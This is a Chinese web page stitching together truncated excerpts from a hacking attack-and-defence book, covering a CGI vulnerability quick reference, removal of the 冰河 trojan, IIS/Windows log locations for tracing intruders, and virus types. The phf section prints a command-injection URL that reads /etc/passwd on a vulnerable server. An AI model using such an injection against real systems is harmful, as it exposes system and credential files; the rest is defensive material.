摘要:
3.5 cgi及系统漏洞速查(1)
3.5 cgi及系统漏洞速查
● phf漏洞
漏洞介绍:phf漏洞是最经典了,可以通过浏览器执行服务器的命令来查找,如下 所示:
/etc/passwd
lynx http://server/cgi-bin/phf?qalias=x%0a/bin/cat%20/etc/passwd
● php.cgi 2.0beta10或更早版本的漏洞
......
摘要:
3.2 常见特洛伊木马的清除方法(2)
3.2.3 冰河清除方法
1. 自动卸载
1.2以后版本的“冰河”本身提供了自动卸载的功能,只需在客户端选择→【控制类命令】→【系统控制】→【自动卸载】命令即可自动卸载。只要先连接127.0.0.1,然后执行【自动卸载】命令就可以彻底卸载冰河。
2. 手动卸载
(1) 重新启动计算机,打开计算机后,按住键盘上的shift键,以安全模式......
黑客攻防技术内幕-安全漏洞与修补(5)
4.3 关于网站安全日志
4.3 关于网站安全日志 【程序编程相关:
保护服务器的端口 让黑客也没办法(3)】 【推荐阅读:
Win2000如何预防Ping攻击】
1.windows nt服务器日志默认存放路径 【扩展信息:
保护服务器的端口 让黑客也没办法(6)】
通过日志记录追查入侵者来源是一种最有效的办法, windows nt的日志文件通常有应用程序日志.安全日志.系统日志.dns服务器日志.ftp日志.www日志等.接下来我们了解一下windows nt服务器上的日志,以下以windows 2000为例.
● www日志
www日志是记录网站来访者的信息及活动情况,默认存放位置在:%windir%\system32\logfiles,如图4-15所示.
说明:
%windir%是指系统文件夹,默认情况下名为:winnt.
图4-15 www日志记录属性
● ftp日志
ftp日志是记录登录者用户名及行为,默认存放位置在:
%windir%\system32\logfiles,如图4-16所示.
图4-16 ftp日志记录属性
● 其他日志
其他一些日志包括:程序日志.安全日志.系统日志.dns日志,它们的默认位置存放位置在%windir%\system32\config.
2. windows nt日志分析说明
ftp日志与www日志在默认情况下每天生成一个日志文件,包含了该日的一切记录,文件名通常为ex(年份)(月份)(日期).
例如:ex020629,就是2002年6月29日产生的日志,如图4-17所示.
图4-17 ftp日志
该日志文件用记事本就可直接打开.首先来看看ftp的日志,如下例:
#software: microsoft internet information services 5.0(微软iis5.0)
#version: 1.0 (版本1.0)
#date: 20020629 0315(服务启动时间日期) ...
下一页 摘要:
3.3 病毒防护修复(1)
3.3 病毒防护修复
从广义上讲,病毒可以归为2类:引导区病毒和文件型病毒。
1. 引导区病毒
引导区病毒隐藏在硬盘或软盘的引导区(boot区),当计算机从感染了引导区病毒的硬盘或软盘启动,或是当计算机从受感染的软盘里读取数据时,引导区病毒就开始发作。一旦它们把自己复制到计算机的内存里,就会感染其他磁盘的引导区或是通过网络传播到其他计算机上。
第一......
